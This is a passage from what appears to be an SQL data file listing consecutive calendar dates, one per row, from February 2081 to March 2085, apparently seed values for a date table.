('2081-02-09'),
('2081-02-10'),
('2081-02-11'),
('2081-02-12'),
('2081-02-13'),
('2081-02-14'),
('2081-02-15'),
('2081-02-16'),
('2081-02-17'),
('2081-02-18'),
('2081-02-19'),
('2081-02-20'),
('2081-02-21'),
('2081-02-22'),
('2081-02-23'),
('2081-02-24'),
('2081-02-25'),
('2081-02-26'),
('2081-02-27'),
('2081-02-28'),
('2081-03-01'),
('2081-03-02'),
('2081-03-03'),
('2081-03-04'),
('2081-03-05'),
('2081-03-06'),
('2081-03-07'),
('2081-03-08'),
('2081-03-09'),
('2081-03-10'),
('2081-03-11'),
('2081-03-12'),
('2081-03-13'),
('2081-03-14'),
('2081-03-15'),
('2081-03-16'),
('2081-03-17'),
('2081-03-18'),
('2081-03-19'),
('2081-03-20'),
('2081-03-21'),
('2081-03-22'),
('2081-03-23'),
('2081-03-24'),
('2081-03-25'),
('2081-03-26'),
('2081-03-27'),
('2081-03-28'),
('2081-03-29'),
('2081-03-30'),
('2081-03-31'),
('2081-04-01'),
('2081-04-02'),
('2081-04-03'),
('2081-04-04'),
('2081-04-05'),
('2081-04-06'),
('2081-04-07'),
('2081-04-08'),
('2081-04-09'),
('2081-04-10'),
('2081-04-11'),
('2081-04-12'),
('2081-04-13'),
('2081-04-14'),
('2081-04-15'),
('2081-04-16'),
('2081-04-17'),
('2081-04-18'),
('2081-04-19'),
('2081-04-20'),
('2081-04-21'),
('2081-04-22'),
('2081-04-23'),
('2081-04-24'),
('2081-04-25'),
('2081-04-26'),
('2081-04-27'),
('2081-04-28'),
('2081-04-29'),
('2081-04-30'),
('2081-05-01'),
('2081-05-02'),
('2081-05-03'),
('2081-05-04'),
('2081-05-05'),
('2081-05-06'),
('2081-05-07'),
('2081-05-08'),
('2081-05-09'),
('2081-05-10'),
('2081-05-11'),
('2081-05-12'),
('2081-05-13'),
('2081-05-14'),
('2081-05-15'),
('2081-05-16'),
('2081-05-17'),
('2081-05-18'),
('2081-05-19'),
('2081-05-20'),
('2081-05-21'),
('2081-05-22'),
('2081-05-23'),
('2081-05-24'),
('2081-05-25'),
('2081-05-26'),
('2081-05-27'),
('2081-05-28'),
('2081-05-29'),
('2081-05-30'),
('2081-05-31'),
('2081-06-01'),
('2081-06-02'),
('2081-06-03'),
('2081-06-04'),
('2081-06-05'),
('2081-06-06'),
('2081-06-07'),
('2081-06-08'),
('2081-06-09'),
('2081-06-10'),
('2081-06-11'),
('2081-06-12'),
('2081-06-13'),
('2081-06-14'),
('2081-06-15'),
('2081-06-16'),
('2081-06-17'),
('2081-06-18'),
('2081-06-19'),
('2081-06-20'),
('2081-06-21'),
('2081-06-22'),
('2081-06-23'),
('2081-06-24'),
('2081-06-25'),
('2081-06-26'),
('2081-06-27'),
('2081-06-28'),
('2081-06-29'),
('2081-06-30'),
('2081-07-01'),
('2081-07-02'),
('2081-07-03'),
('2081-07-04'),
('2081-07-05'),
('2081-07-06'),
('2081-07-07'),
('2081-07-08'),
('2081-07-09'),
('2081-07-10'),
('2081-07-11'),
('2081-07-12'),
('2081-07-13'),
('2081-07-14'),
('2081-07-15'),
('2081-07-16'),
('2081-07-17'),
('2081-07-18'),
('2081-07-19'),
('2081-07-20'),
('2081-07-21'),
('2081-07-22'),
('2081-07-23'),
('2081-07-24'),
('2081-07-25'),
('2081-07-26'),
('2081-07-27'),
('2081-07-28'),
('2081-07-29'),
('2081-07-30'),
('2081-07-31'),
('2081-08-01'),
('2081-08-02'),
('2081-08-03'),
('2081-08-04'),
('2081-08-05'),
('2081-08-06'),
('2081-08-07'),
('2081-08-08'),
('2081-08-09'),
('2081-08-10'),
('2081-08-11'),
('2081-08-12'),
('2081-08-13'),
('2081-08-14'),
('2081-08-15'),
('2081-08-16'),
('2081-08-17'),
('2081-08-18'),
('2081-08-19'),
('2081-08-20'),
('2081-08-21'),
('2081-08-22'),
('2081-08-23'),
('2081-08-24'),
('2081-08-25'),
('2081-08-26'),
('2081-08-27'),
('2081-08-28'),
('2081-08-29'),
('2081-08-30'),
('2081-08-31'),
('2081-09-01'),
('2081-09-02'),
('2081-09-03'),
('2081-09-04'),
('2081-09-05'),
('2081-09-06'),
('2081-09-07'),
('2081-09-08'),
('2081-09-09'),
('2081-09-10'),
('2081-09-11'),
('2081-09-12'),
('2081-09-13'),
('2081-09-14'),
('2081-09-15'),
('2081-09-16'),
('2081-09-17'),
('2081-09-18'),
('2081-09-19'),
('2081-09-20'),
('2081-09-21'),
('2081-09-22'),
('2081-09-23'),
('2081-09-24'),
('2081-09-25'),
('2081-09-26'),
('2081-09-27'),
('2081-09-28'),
('2081-09-29'),
('2081-09-30'),
('2081-10-01'),
('2081-10-02'),
('2081-10-03'),
('2081-10-04'),
('2081-10-05'),
('2081-10-06'),
('2081-10-07'),
('2081-10-08'),
('2081-10-09'),
('2081-10-10'),
('2081-10-11'),
('2081-10-12'),
('2081-10-13'),
('2081-10-14'),
('2081-10-15'),
('2081-10-16'),
('2081-10-17'),
('2081-10-18'),
('2081-10-19'),
('2081-10-20'),
('2081-10-21'),
('2081-10-22'),
('2081-10-23'),
('2081-10-24'),
('2081-10-25'),
('2081-10-26'),
('2081-10-27'),
('2081-10-28'),
('2081-10-29'),
('2081-10-30'),
('2081-10-31'),
('2081-11-01'),
('2081-11-02'),
('2081-11-03'),
('2081-11-04'),
('2081-11-05'),
('2081-11-06'),
('2081-11-07'),
('2081-11-08'),
('2081-11-09'),
('2081-11-10'),
('2081-11-11'),
('2081-11-12'),
('2081-11-13'),
('2081-11-14'),
('2081-11-15'),
('2081-11-16'),
('2081-11-17'),
('2081-11-18'),
('2081-11-19'),
('2081-11-20'),
('2081-11-21'),
('2081-11-22'),
('2081-11-23'),
('2081-11-24'),
('2081-11-25'),
('2081-11-26'),
('2081-11-27'),
('2081-11-28'),
('2081-11-29'),
('2081-11-30'),
('2081-12-01'),
('2081-12-02'),
('2081-12-03'),
('2081-12-04'),
('2081-12-05'),
('2081-12-06'),
('2081-12-07'),
('2081-12-08'),
('2081-12-09'),
('2081-12-10'),
('2081-12-11'),
('2081-12-12'),
('2081-12-13'),
('2081-12-14'),
('2081-12-15'),
('2081-12-16'),
('2081-12-17'),
('2081-12-18'),
('2081-12-19'),
('2081-12-20'),
('2081-12-21'),
('2081-12-22'),
('2081-12-23'),
('2081-12-24'),
('2081-12-25'),
('2081-12-26'),
('2081-12-27'),
('2081-12-28'),
('2081-12-29'),
('2081-12-30'),
('2081-12-31'),
('2082-01-01'),
('2082-01-02'),
('2082-01-03'),
('2082-01-04'),
('2082-01-05'),
('2082-01-06'),
('2082-01-07'),
('2082-01-08'),
('2082-01-09'),
('2082-01-10'),
('2082-01-11'),
('2082-01-12'),
('2082-01-13'),
('2082-01-14'),
('2082-01-15'),
('2082-01-16'),
('2082-01-17'),
('2082-01-18'),
('2082-01-19'),
('2082-01-20'),
('2082-01-21'),
('2082-01-22'),
('2082-01-23'),
('2082-01-24'),
('2082-01-25'),
('2082-01-26'),
('2082-01-27'),
('2082-01-28'),
('2082-01-29'),
('2082-01-30'),
('2082-01-31'),
('2082-02-01'),
('2082-02-02'),
('2082-02-03'),
('2082-02-04'),
('2082-02-05'),
('2082-02-06'),
('2082-02-07'),
('2082-02-08'),
('2082-02-09'),
('2082-02-10'),
('2082-02-11'),
('2082-02-12'),
('2082-02-13'),
('2082-02-14'),
('2082-02-15'),
('2082-02-16'),
('2082-02-17'),
('2082-02-18'),
('2082-02-19'),
('2082-02-20'),
('2082-02-21'),
('2082-02-22'),
('2082-02-23'),
('2082-02-24'),
('2082-02-25'),
('2082-02-26'),
('2082-02-27'),
('2082-02-28'),
('2082-03-01'),
('2082-03-02'),
('2082-03-03'),
('2082-03-04'),
('2082-03-05'),
('2082-03-06'),
('2082-03-07'),
('2082-03-08'),
('2082-03-09'),
('2082-03-10'),
('2082-03-11'),
('2082-03-12'),
('2082-03-13'),
('2082-03-14'),
('2082-03-15'),
('2082-03-16'),
('2082-03-17'),
('2082-03-18'),
('2082-03-19'),
('2082-03-20'),
('2082-03-21'),
('2082-03-22'),
('2082-03-23'),
('2082-03-24'),
('2082-03-25'),
('2082-03-26'),
('2082-03-27'),
('2082-03-28'),
('2082-03-29'),
('2082-03-30'),
('2082-03-31'),
('2082-04-01'),
('2082-04-02'),
('2082-04-03'),
('2082-04-04'),
('2082-04-05'),
('2082-04-06'),
('2082-04-07'),
('2082-04-08'),
('2082-04-09'),
('2082-04-10'),
('2082-04-11'),
('2082-04-12'),
('2082-04-13'),
('2082-04-14'),
('2082-04-15'),
('2082-04-16'),
('2082-04-17'),
('2082-04-18'),
('2082-04-19'),
('2082-04-20'),
('2082-04-21'),
('2082-04-22'),
('2082-04-23'),
('2082-04-24'),
('2082-04-25'),
('2082-04-26'),
('2082-04-27'),
('2082-04-28'),
('2082-04-29'),
('2082-04-30'),
('2082-05-01'),
('2082-05-02'),
('2082-05-03'),
('2082-05-04'),
('2082-05-05'),
('2082-05-06'),
('2082-05-07'),
('2082-05-08'),
('2082-05-09'),
('2082-05-10'),
('2082-05-11'),
('2082-05-12'),
('2082-05-13'),
('2082-05-14'),
('2082-05-15'),
('2082-05-16'),
('2082-05-17'),
('2082-05-18'),
('2082-05-19'),
('2082-05-20'),
('2082-05-21'),
('2082-05-22'),
('2082-05-23'),
('2082-05-24'),
('2082-05-25'),
('2082-05-26'),
('2082-05-27'),
('2082-05-28'),
('2082-05-29'),
('2082-05-30'),
('2082-05-31'),
('2082-06-01'),
('2082-06-02'),
('2082-06-03'),
('2082-06-04'),
('2082-06-05'),
('2082-06-06'),
('2082-06-07'),
('2082-06-08'),
('2082-06-09'),
('2082-06-10'),
('2082-06-11'),
('2082-06-12'),
('2082-06-13'),
('2082-06-14'),
('2082-06-15'),
('2082-06-16'),
('2082-06-17'),
('2082-06-18'),
('2082-06-19'),
('2082-06-20'),
('2082-06-21'),
('2082-06-22'),
('2082-06-23'),
('2082-06-24'),
('2082-06-25'),
('2082-06-26'),
('2082-06-27'),
('2082-06-28'),
('2082-06-29'),
('2082-06-30'),
('2082-07-01'),
('2082-07-02'),
('2082-07-03'),
('2082-07-04'),
('2082-07-05'),
('2082-07-06'),
('2082-07-07'),
('2082-07-08'),
('2082-07-09'),
('2082-07-10'),
('2082-07-11'),
('2082-07-12'),
('2082-07-13'),
('2082-07-14'),
('2082-07-15'),
('2082-07-16'),
('2082-07-17'),
('2082-07-18'),
('2082-07-19'),
('2082-07-20'),
('2082-07-21'),
('2082-07-22'),
('2082-07-23'),
('2082-07-24'),
('2082-07-25'),
('2082-07-26'),
('2082-07-27'),
('2082-07-28'),
('2082-07-29'),
('2082-07-30'),
('2082-07-31'),
('2082-08-01'),
('2082-08-02'),
('2082-08-03'),
('2082-08-04'),
('2082-08-05'),
('2082-08-06'),
('2082-08-07'),
('2082-08-08'),
('2082-08-09'),
('2082-08-10'),
('2082-08-11'),
('2082-08-12'),
('2082-08-13'),
('2082-08-14'),
('2082-08-15'),
('2082-08-16'),
('2082-08-17'),
('2082-08-18'),
('2082-08-19'),
('2082-08-20'),
('2082-08-21'),
('2082-08-22'),
('2082-08-23'),
('2082-08-24'),
('2082-08-25'),
('2082-08-26'),
('2082-08-27'),
('2082-08-28'),
('2082-08-29'),
('2082-08-30'),
('2082-08-31'),
('2082-09-01'),
('2082-09-02'),
('2082-09-03'),
('2082-09-04'),
('2082-09-05'),
('2082-09-06'),
('2082-09-07'),
('2082-09-08'),
('2082-09-09'),
('2082-09-10'),
('2082-09-11'),
('2082-09-12'),
('2082-09-13'),
('2082-09-14'),
('2082-09-15'),
('2082-09-16'),
('2082-09-17'),
('2082-09-18'),
('2082-09-19'),
('2082-09-20'),
('2082-09-21'),
('2082-09-22'),
('2082-09-23'),
('2082-09-24'),
('2082-09-25'),
('2082-09-26'),
('2082-09-27'),
('2082-09-28'),
('2082-09-29'),
('2082-09-30'),
('2082-10-01'),
('2082-10-02'),
('2082-10-03'),
('2082-10-04'),
('2082-10-05'),
('2082-10-06'),
('2082-10-07'),
('2082-10-08'),
('2082-10-09'),
('2082-10-10'),
('2082-10-11'),
('2082-10-12'),
('2082-10-13'),
('2082-10-14'),
('2082-10-15'),
('2082-10-16'),
('2082-10-17'),
('2082-10-18'),
('2082-10-19'),
('2082-10-20'),
('2082-10-21'),
('2082-10-22'),
('2082-10-23'),
('2082-10-24'),
('2082-10-25'),
('2082-10-26'),
('2082-10-27'),
('2082-10-28'),
('2082-10-29'),
('2082-10-30'),
('2082-10-31'),
('2082-11-01'),
('2082-11-02'),
('2082-11-03'),
('2082-11-04'),
('2082-11-05'),
('2082-11-06'),
('2082-11-07'),
('2082-11-08'),
('2082-11-09'),
('2082-11-10'),
('2082-11-11'),
('2082-11-12'),
('2082-11-13'),
('2082-11-14'),
('2082-11-15'),
('2082-11-16'),
('2082-11-17'),
('2082-11-18'),
('2082-11-19'),
('2082-11-20'),
('2082-11-21'),
('2082-11-22'),
('2082-11-23'),
('2082-11-24'),
('2082-11-25'),
('2082-11-26'),
('2082-11-27'),
('2082-11-28'),
('2082-11-29'),
('2082-11-30'),
('2082-12-01'),
('2082-12-02'),
('2082-12-03'),
('2082-12-04'),
('2082-12-05'),
('2082-12-06'),
('2082-12-07'),
('2082-12-08'),
('2082-12-09'),
('2082-12-10'),
('2082-12-11'),
('2082-12-12'),
('2082-12-13'),
('2082-12-14'),
('2082-12-15'),
('2082-12-16'),
('2082-12-17'),
('2082-12-18'),
('2082-12-19'),
('2082-12-20'),
('2082-12-21'),
('2082-12-22'),
('2082-12-23'),
('2082-12-24'),
('2082-12-25'),
('2082-12-26'),
('2082-12-27'),
('2082-12-28'),
('2082-12-29'),
('2082-12-30'),
('2082-12-31'),
('2083-01-01'),
('2083-01-02'),
('2083-01-03'),
('2083-01-04'),
('2083-01-05'),
('2083-01-06'),
('2083-01-07'),
('2083-01-08'),
('2083-01-09'),
('2083-01-10'),
('2083-01-11'),
('2083-01-12'),
('2083-01-13'),
('2083-01-14'),
('2083-01-15'),
('2083-01-16'),
('2083-01-17'),
('2083-01-18'),
('2083-01-19'),
('2083-01-20'),
('2083-01-21'),
('2083-01-22'),
('2083-01-23'),
('2083-01-24'),
('2083-01-25'),
('2083-01-26'),
('2083-01-27'),
('2083-01-28'),
('2083-01-29'),
('2083-01-30'),
('2083-01-31'),
('2083-02-01'),
('2083-02-02'),
('2083-02-03'),
('2083-02-04'),
('2083-02-05'),
('2083-02-06'),
('2083-02-07'),
('2083-02-08'),
('2083-02-09'),
('2083-02-10'),
('2083-02-11'),
('2083-02-12'),
('2083-02-13'),
('2083-02-14'),
('2083-02-15'),
('2083-02-16'),
('2083-02-17'),
('2083-02-18'),
('2083-02-19'),
('2083-02-20'),
('2083-02-21'),
('2083-02-22'),
('2083-02-23'),
('2083-02-24'),
('2083-02-25'),
('2083-02-26'),
('2083-02-27'),
('2083-02-28'),
('2083-03-01'),
('2083-03-02'),
('2083-03-03'),
('2083-03-04'),
('2083-03-05'),
('2083-03-06'),
('2083-03-07'),
('2083-03-08'),
('2083-03-09'),
('2083-03-10'),
('2083-03-11'),
('2083-03-12'),
('2083-03-13'),
('2083-03-14'),
('2083-03-15'),
('2083-03-16'),
('2083-03-17'),
('2083-03-18'),
('2083-03-19'),
('2083-03-20'),
('2083-03-21'),
('2083-03-22'),
('2083-03-23'),
('2083-03-24'),
('2083-03-25'),
('2083-03-26'),
('2083-03-27'),
('2083-03-28'),
('2083-03-29'),
('2083-03-30'),
('2083-03-31'),
('2083-04-01'),
('2083-04-02'),
('2083-04-03'),
('2083-04-04'),
('2083-04-05'),
('2083-04-06'),
('2083-04-07'),
('2083-04-08'),
('2083-04-09'),
('2083-04-10'),
('2083-04-11'),
('2083-04-12'),
('2083-04-13'),
('2083-04-14'),
('2083-04-15'),
('2083-04-16'),
('2083-04-17'),
('2083-04-18'),
('2083-04-19'),
('2083-04-20'),
('2083-04-21'),
('2083-04-22'),
('2083-04-23'),
('2083-04-24'),
('2083-04-25'),
('2083-04-26'),
('2083-04-27'),
('2083-04-28'),
('2083-04-29'),
('2083-04-30'),
('2083-05-01'),
('2083-05-02'),
('2083-05-03'),
('2083-05-04'),
('2083-05-05'),
('2083-05-06'),
('2083-05-07'),
('2083-05-08'),
('2083-05-09'),
('2083-05-10'),
('2083-05-11'),
('2083-05-12'),
('2083-05-13'),
('2083-05-14'),
('2083-05-15'),
('2083-05-16'),
('2083-05-17'),
('2083-05-18'),
('2083-05-19'),
('2083-05-20'),
('2083-05-21'),
('2083-05-22'),
('2083-05-23'),
('2083-05-24'),
('2083-05-25'),
('2083-05-26'),
('2083-05-27'),
('2083-05-28'),
('2083-05-29'),
('2083-05-30'),
('2083-05-31'),
('2083-06-01'),
('2083-06-02'),
('2083-06-03'),
('2083-06-04'),
('2083-06-05'),
('2083-06-06'),
('2083-06-07'),
('2083-06-08'),
('2083-06-09'),
('2083-06-10'),
('2083-06-11'),
('2083-06-12'),
('2083-06-13'),
('2083-06-14'),
('2083-06-15'),
('2083-06-16'),
('2083-06-17'),
('2083-06-18'),
('2083-06-19'),
('2083-06-20'),
('2083-06-21'),
('2083-06-22'),
('2083-06-23'),
('2083-06-24'),
('2083-06-25'),
('2083-06-26'),
('2083-06-27'),
('2083-06-28'),
('2083-06-29'),
('2083-06-30'),
('2083-07-01'),
('2083-07-02'),
('2083-07-03'),
('2083-07-04'),
('2083-07-05'),
('2083-07-06'),
('2083-07-07'),
('2083-07-08'),
('2083-07-09'),
('2083-07-10'),
('2083-07-11'),
('2083-07-12'),
('2083-07-13'),
('2083-07-14'),
('2083-07-15'),
('2083-07-16'),
('2083-07-17'),
('2083-07-18'),
('2083-07-19'),
('2083-07-20'),
('2083-07-21'),
('2083-07-22'),
('2083-07-23'),
('2083-07-24'),
('2083-07-25'),
('2083-07-26'),
('2083-07-27'),
('2083-07-28'),
('2083-07-29'),
('2083-07-30'),
('2083-07-31'),
('2083-08-01'),
('2083-08-02'),
('2083-08-03'),
('2083-08-04'),
('2083-08-05'),
('2083-08-06'),
('2083-08-07'),
('2083-08-08'),
('2083-08-09'),
('2083-08-10'),
('2083-08-11'),
('2083-08-12'),
('2083-08-13'),
('2083-08-14'),
('2083-08-15'),
('2083-08-16'),
('2083-08-17'),
('2083-08-18'),
('2083-08-19'),
('2083-08-20'),
('2083-08-21'),
('2083-08-22'),
('2083-08-23'),
('2083-08-24'),
('2083-08-25'),
('2083-08-26'),
('2083-08-27'),
('2083-08-28'),
('2083-08-29'),
('2083-08-30'),
('2083-08-31'),
('2083-09-01'),
('2083-09-02'),
('2083-09-03'),
('2083-09-04'),
('2083-09-05'),
('2083-09-06'),
('2083-09-07'),
('2083-09-08'),
('2083-09-09'),
('2083-09-10'),
('2083-09-11'),
('2083-09-12'),
('2083-09-13'),
('2083-09-14'),
('2083-09-15'),
('2083-09-16'),
('2083-09-17'),
('2083-09-18'),
('2083-09-19'),
('2083-09-20'),
('2083-09-21'),
('2083-09-22'),
('2083-09-23'),
('2083-09-24'),
('2083-09-25'),
('2083-09-26'),
('2083-09-27'),
('2083-09-28'),
('2083-09-29'),
('2083-09-30'),
('2083-10-01'),
('2083-10-02'),
('2083-10-03'),
('2083-10-04'),
('2083-10-05'),
('2083-10-06'),
('2083-10-07'),
('2083-10-08'),
('2083-10-09'),
('2083-10-10'),
('2083-10-11'),
('2083-10-12'),
('2083-10-13'),
('2083-10-14'),
('2083-10-15'),
('2083-10-16'),
('2083-10-17'),
('2083-10-18'),
('2083-10-19'),
('2083-10-20'),
('2083-10-21'),
('2083-10-22'),
('2083-10-23'),
('2083-10-24'),
('2083-10-25'),
('2083-10-26'),
('2083-10-27'),
('2083-10-28'),
('2083-10-29'),
('2083-10-30'),
('2083-10-31'),
('2083-11-01'),
('2083-11-02'),
('2083-11-03'),
('2083-11-04'),
('2083-11-05'),
('2083-11-06'),
('2083-11-07'),
('2083-11-08'),
('2083-11-09'),
('2083-11-10'),
('2083-11-11'),
('2083-11-12'),
('2083-11-13'),
('2083-11-14'),
('2083-11-15'),
('2083-11-16'),
('2083-11-17'),
('2083-11-18'),
('2083-11-19'),
('2083-11-20'),
('2083-11-21'),
('2083-11-22'),
('2083-11-23'),
('2083-11-24'),
('2083-11-25'),
('2083-11-26'),
('2083-11-27'),
('2083-11-28'),
('2083-11-29'),
('2083-11-30'),
('2083-12-01'),
('2083-12-02'),
('2083-12-03'),
('2083-12-04'),
('2083-12-05'),
('2083-12-06'),
('2083-12-07'),
('2083-12-08'),
('2083-12-09'),
('2083-12-10'),
('2083-12-11'),
('2083-12-12'),
('2083-12-13'),
('2083-12-14'),
('2083-12-15'),
('2083-12-16'),
('2083-12-17'),
('2083-12-18'),
('2083-12-19'),
('2083-12-20'),
('2083-12-21'),
('2083-12-22'),
('2083-12-23'),
('2083-12-24'),
('2083-12-25'),
('2083-12-26'),
('2083-12-27'),
('2083-12-28'),
('2083-12-29'),
('2083-12-30'),
('2083-12-31'),
('2084-01-01'),
('2084-01-02'),
('2084-01-03'),
('2084-01-04'),
('2084-01-05'),
('2084-01-06'),
('2084-01-07'),
('2084-01-08'),
('2084-01-09'),
('2084-01-10'),
('2084-01-11'),
('2084-01-12'),
('2084-01-13'),
('2084-01-14'),
('2084-01-15'),
('2084-01-16'),
('2084-01-17'),
('2084-01-18'),
('2084-01-19'),
('2084-01-20'),
('2084-01-21'),
('2084-01-22'),
('2084-01-23'),
('2084-01-24'),
('2084-01-25'),
('2084-01-26'),
('2084-01-27'),
('2084-01-28'),
('2084-01-29'),
('2084-01-30'),
('2084-01-31'),
('2084-02-01'),
('2084-02-02'),
('2084-02-03'),
('2084-02-04'),
('2084-02-05'),
('2084-02-06'),
('2084-02-07'),
('2084-02-08'),
('2084-02-09'),
('2084-02-10'),
('2084-02-11'),
('2084-02-12'),
('2084-02-13'),
('2084-02-14'),
('2084-02-15'),
('2084-02-16'),
('2084-02-17'),
('2084-02-18'),
('2084-02-19'),
('2084-02-20'),
('2084-02-21'),
('2084-02-22'),
('2084-02-23'),
('2084-02-24'),
('2084-02-25'),
('2084-02-26'),
('2084-02-27'),
('2084-02-28'),
('2084-02-29'),
('2084-03-01'),
('2084-03-02'),
('2084-03-03'),
('2084-03-04'),
('2084-03-05'),
('2084-03-06'),
('2084-03-07'),
('2084-03-08'),
('2084-03-09'),
('2084-03-10'),
('2084-03-11'),
('2084-03-12'),
('2084-03-13'),
('2084-03-14'),
('2084-03-15'),
('2084-03-16'),
('2084-03-17'),
('2084-03-18'),
('2084-03-19'),
('2084-03-20'),
('2084-03-21'),
('2084-03-22'),
('2084-03-23'),
('2084-03-24'),
('2084-03-25'),
('2084-03-26'),
('2084-03-27'),
('2084-03-28'),
('2084-03-29'),
('2084-03-30'),
('2084-03-31'),
('2084-04-01'),
('2084-04-02'),
('2084-04-03'),
('2084-04-04'),
('2084-04-05'),
('2084-04-06'),
('2084-04-07'),
('2084-04-08'),
('2084-04-09'),
('2084-04-10'),
('2084-04-11'),
('2084-04-12'),
('2084-04-13'),
('2084-04-14'),
('2084-04-15'),
('2084-04-16'),
('2084-04-17'),
('2084-04-18'),
('2084-04-19'),
('2084-04-20'),
('2084-04-21'),
('2084-04-22'),
('2084-04-23'),
('2084-04-24'),
('2084-04-25'),
('2084-04-26'),
('2084-04-27'),
('2084-04-28'),
('2084-04-29'),
('2084-04-30'),
('2084-05-01'),
('2084-05-02'),
('2084-05-03'),
('2084-05-04'),
('2084-05-05'),
('2084-05-06'),
('2084-05-07'),
('2084-05-08'),
('2084-05-09'),
('2084-05-10'),
('2084-05-11'),
('2084-05-12'),
('2084-05-13'),
('2084-05-14'),
('2084-05-15'),
('2084-05-16'),
('2084-05-17'),
('2084-05-18'),
('2084-05-19'),
('2084-05-20'),
('2084-05-21'),
('2084-05-22'),
('2084-05-23'),
('2084-05-24'),
('2084-05-25'),
('2084-05-26'),
('2084-05-27'),
('2084-05-28'),
('2084-05-29'),
('2084-05-30'),
('2084-05-31'),
('2084-06-01'),
('2084-06-02'),
('2084-06-03'),
('2084-06-04'),
('2084-06-05'),
('2084-06-06'),
('2084-06-07'),
('2084-06-08'),
('2084-06-09'),
('2084-06-10'),
('2084-06-11'),
('2084-06-12'),
('2084-06-13'),
('2084-06-14'),
('2084-06-15'),
('2084-06-16'),
('2084-06-17'),
('2084-06-18'),
('2084-06-19'),
('2084-06-20'),
('2084-06-21'),
('2084-06-22'),
('2084-06-23'),
('2084-06-24'),
('2084-06-25'),
('2084-06-26'),
('2084-06-27'),
('2084-06-28'),
('2084-06-29'),
('2084-06-30'),
('2084-07-01'),
('2084-07-02'),
('2084-07-03'),
('2084-07-04'),
('2084-07-05'),
('2084-07-06'),
('2084-07-07'),
('2084-07-08'),
('2084-07-09'),
('2084-07-10'),
('2084-07-11'),
('2084-07-12'),
('2084-07-13'),
('2084-07-14'),
('2084-07-15'),
('2084-07-16'),
('2084-07-17'),
('2084-07-18'),
('2084-07-19'),
('2084-07-20'),
('2084-07-21'),
('2084-07-22'),
('2084-07-23'),
('2084-07-24'),
('2084-07-25'),
('2084-07-26'),
('2084-07-27'),
('2084-07-28'),
('2084-07-29'),
('2084-07-30'),
('2084-07-31'),
('2084-08-01'),
('2084-08-02'),
('2084-08-03'),
('2084-08-04'),
('2084-08-05'),
('2084-08-06'),
('2084-08-07'),
('2084-08-08'),
('2084-08-09'),
('2084-08-10'),
('2084-08-11'),
('2084-08-12'),
('2084-08-13'),
('2084-08-14'),
('2084-08-15'),
('2084-08-16'),
('2084-08-17'),
('2084-08-18'),
('2084-08-19'),
('2084-08-20'),
('2084-08-21'),
('2084-08-22'),
('2084-08-23'),
('2084-08-24'),
('2084-08-25'),
('2084-08-26'),
('2084-08-27'),
('2084-08-28'),
('2084-08-29'),
('2084-08-30'),
('2084-08-31'),
('2084-09-01'),
('2084-09-02'),
('2084-09-03'),
('2084-09-04'),
('2084-09-05'),
('2084-09-06'),
('2084-09-07'),
('2084-09-08'),
('2084-09-09'),
('2084-09-10'),
('2084-09-11'),
('2084-09-12'),
('2084-09-13'),
('2084-09-14'),
('2084-09-15'),
('2084-09-16'),
('2084-09-17'),
('2084-09-18'),
('2084-09-19'),
('2084-09-20'),
('2084-09-21'),
('2084-09-22'),
('2084-09-23'),
('2084-09-24'),
('2084-09-25'),
('2084-09-26'),
('2084-09-27'),
('2084-09-28'),
('2084-09-29'),
('2084-09-30'),
('2084-10-01'),
('2084-10-02'),
('2084-10-03'),
('2084-10-04'),
('2084-10-05'),
('2084-10-06'),
('2084-10-07'),
('2084-10-08'),
('2084-10-09'),
('2084-10-10'),
('2084-10-11'),
('2084-10-12'),
('2084-10-13'),
('2084-10-14'),
('2084-10-15'),
('2084-10-16'),
('2084-10-17'),
('2084-10-18'),
('2084-10-19'),
('2084-10-20'),
('2084-10-21'),
('2084-10-22'),
('2084-10-23'),
('2084-10-24'),
('2084-10-25'),
('2084-10-26'),
('2084-10-27'),
('2084-10-28'),
('2084-10-29'),
('2084-10-30'),
('2084-10-31'),
('2084-11-01'),
('2084-11-02'),
('2084-11-03'),
('2084-11-04'),
('2084-11-05'),
('2084-11-06'),
('2084-11-07'),
('2084-11-08'),
('2084-11-09'),
('2084-11-10'),
('2084-11-11'),
('2084-11-12'),
('2084-11-13'),
('2084-11-14'),
('2084-11-15'),
('2084-11-16'),
('2084-11-17'),
('2084-11-18'),
('2084-11-19'),
('2084-11-20'),
('2084-11-21'),
('2084-11-22'),
('2084-11-23'),
('2084-11-24'),
('2084-11-25'),
('2084-11-26'),
('2084-11-27'),
('2084-11-28'),
('2084-11-29'),
('2084-11-30'),
('2084-12-01'),
('2084-12-02'),
('2084-12-03'),
('2084-12-04'),
('2084-12-05'),
('2084-12-06'),
('2084-12-07'),
('2084-12-08'),
('2084-12-09'),
('2084-12-10'),
('2084-12-11'),
('2084-12-12'),
('2084-12-13'),
('2084-12-14'),
('2084-12-15'),
('2084-12-16'),
('2084-12-17'),
('2084-12-18'),
('2084-12-19'),
('2084-12-20'),
('2084-12-21'),
('2084-12-22'),
('2084-12-23'),
('2084-12-24'),
('2084-12-25'),
('2084-12-26'),
('2084-12-27'),
('2084-12-28'),
('2084-12-29'),
('2084-12-30'),
('2084-12-31'),
('2085-01-01'),
('2085-01-02'),
('2085-01-03'),
('2085-01-04'),
('2085-01-05'),
('2085-01-06'),
('2085-01-07'),
('2085-01-08'),
('2085-01-09'),
('2085-01-10'),
('2085-01-11'),
('2085-01-12'),
('2085-01-13'),
('2085-01-14'),
('2085-01-15'),
('2085-01-16'),
('2085-01-17'),
('2085-01-18'),
('2085-01-19'),
('2085-01-20'),
('2085-01-21'),
('2085-01-22'),
('2085-01-23'),
('2085-01-24'),
('2085-01-25'),
('2085-01-26'),
('2085-01-27'),
('2085-01-28'),
('2085-01-29'),
('2085-01-30'),
('2085-01-31'),
('2085-02-01'),
('2085-02-02'),
('2085-02-03'),
('2085-02-04'),
('2085-02-05'),
('2085-02-06'),
('2085-02-07'),
('2085-02-08'),
('2085-02-09'),
('2085-02-10'),
('2085-02-11'),
('2085-02-12'),
('2085-02-13'),
('2085-02-14'),
('2085-02-15'),
('2085-02-16'),
('2085-02-17'),
('2085-02-18'),
('2085-02-19'),
('2085-02-20'),
('2085-02-21'),
('2085-02-22'),
('2085-02-23'),
('2085-02-24'),
('2085-02-25'),
('2085-02-26'),
('2085-02-27'),
('2085-02-28'),
('2085-03-01'),
('2085-03-02'),
('2085-03-03'),
('2085-03-04'),
('2085-03-05'),
('2085-03-06'),
('2085-03-07'),
('2085-03-08'),
('2085-03-09'),
('2085-03-10'),
('2085-03-11'),
('2085-03-12'),
('2085-03-13'),
('2085-03-14'),
('2085-03-15'),
('2085-03-16'),
('2085-03-17'),
('2085-03-18'),
('2085-03-19'),
